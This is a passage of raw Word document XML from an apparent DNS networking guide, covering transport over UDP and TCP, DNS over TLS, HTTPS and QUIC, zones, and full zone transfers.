        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RA (Recursion Available):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Server supports recursion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F9708" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCODE:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Response code (0=No Error, 3=NXDOMAIN, 2=SERVFAIL, 5=REFUSED).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32021348" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 DNS over UDP vs. TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA70EC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP (default, port 53):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BAD750" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS was designed for UDP — small queries, small responses, one round trip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE30023" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>No connection setup overhead (no TCP handshake).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02892406" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Original limit: 512 bytes per UDP message (fits in a single Ethernet frame without fragmentation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62379D78" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EDNS0 extension:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Allows UDP responses up to 4096 bytes (or even larger). Most modern DNS uses EDNS0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA0F3A5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When TCP is used (port 53):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAFAC66" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="750"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Response exceeds UDP size limit (TC flag set) → client retries over TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D75AC61" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="750"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Zone transfers (AXFR/IXFR) always use TCP (bulk data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2662F196" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="750"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Some security-conscious deployments use TCP for all queries (prevents IP spoofing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDAD425" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The truncation flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32096250" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="751"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client sends UDP query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D6CDB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="751"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Response is 2000 bytes. Server's max UDP is 512. Sets TC=1, sends truncated response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7715E692" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="751"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client sees TC=1, opens TCP connection to the same server, re-sends the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B6727" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="751"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Server sends full response over TCP (no size limit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F0FD3C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 DNS over HTTPS (DoH) and DNS over TLS (DoT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232FDE3C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem with plain DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D6BCD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Queries travel in cleartext → anyone on the network path (ISP, coffee shop WiFi, government) can see which domains you're resolving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CD86AB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Responses can be tampered with (DNS spoofing) without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B416E0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS over TLS (DoT) — RFC 7858:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE7786" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Standard DNS protocol wrapped in TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099C3BF4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Port 853.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B4C540" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The recursive resolver terminates TLS and processes the DNS query normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FFF846" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Encrypts the query/response between client and resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E46EF9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Downside: uses a dedicated port (easy to block/identify at network level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A81FC42" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS over HTTPS (DoH) — RFC 8484:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7337E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="754"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS queries/responses carried as HTTP POST/GET over HTTPS (port 443).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F0F24" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="754"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Indistinguishable from normal HTTPS traffic (can't be blocked without blocking all HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00348B8F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="754"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Format: either standard DNS wire format in the HTTP body, or JSON (for debugging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA9841" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example DoH request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0FF55E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244F3D6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>POST https://dns.google/dns-query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B26AA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Content-Type: application/dns-message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3017445D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Body: [binary DNS message]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A68053" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System design implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995B025" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="755"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DoH adds latency: TCP handshake + TLS handshake + HTTP request overhead. But connection reuse (HTTP/2 keep-alive) amortizes this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E933391" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="755"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DoH centralizes DNS resolution to a few providers (Google, Cloudflare). ISPs lose visibility (can't see queries for filtering/compliance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102DF707" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="755"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Corporate networks may block DoH to maintain DNS-based security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A879B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.4 DNS over QUIC (DoQ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E12AC2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The newest transport:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4432526E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="756"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Uses QUIC (UDP-based, encrypted, multiplexed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59912CC3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="756"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Combines the privacy of DoT/DoH with lower latency (0-RTT connection establishment after first connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F16C6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="756"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Port 853 (same as DoT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC96CEB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="756"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Avoids TCP head-of-line blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036435B0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="756"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Still early adoption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366C4AE6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="56763E98">
          <v:rect id="_x0000_i3483" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7382289A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. DNS Zone Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635C8DFC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 What a Zone Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BFE811" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>A zone is a contiguous portion of the DNS namespace managed by a single authority. Not the same as a domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D36C71F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="757"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com is a domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098195F4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="757"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The zone example.com might contain: www.example.com, mail.example.com, api.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B627321" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="757"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>But if dev.example.com is delegated to a different set of nameservers, it's a SEPARATE zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE78964" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E70FC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Zone: example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56913B1A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> www.example.com (A record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C954032" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> mail.example.com (A record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CC7949" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> api.example.com (CNAME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5355A50F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>└── dev.example.com (NS → delegated, NOT in this zone)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA0B7D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="7187887C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Zone: dev.example.com (managed separately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778BE139" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> staging.dev.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4C425D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>└── testing.dev.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249AD0F7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Zone Transfers (AXFR/IXFR) — Replication Between Nameservers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624F4BC6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why zone transfers exist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171AE60A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>You have multiple authoritative nameservers (for redundancy). They all need the same zone data. Zone transfer is the mechanism to synchronize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7D1D0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AXFR (Full Zone Transfer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27392402" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="758"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Secondary nameserver connects to primary via TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5627158D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="758"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Sends AXFR query for the zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34729E3C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="758"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Primary responds with EVERY record in the zone (complete copy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2D3FBC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="758"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Secondary replaces its local copy entirely.</w:t>
      </w:r>
    </w:p>
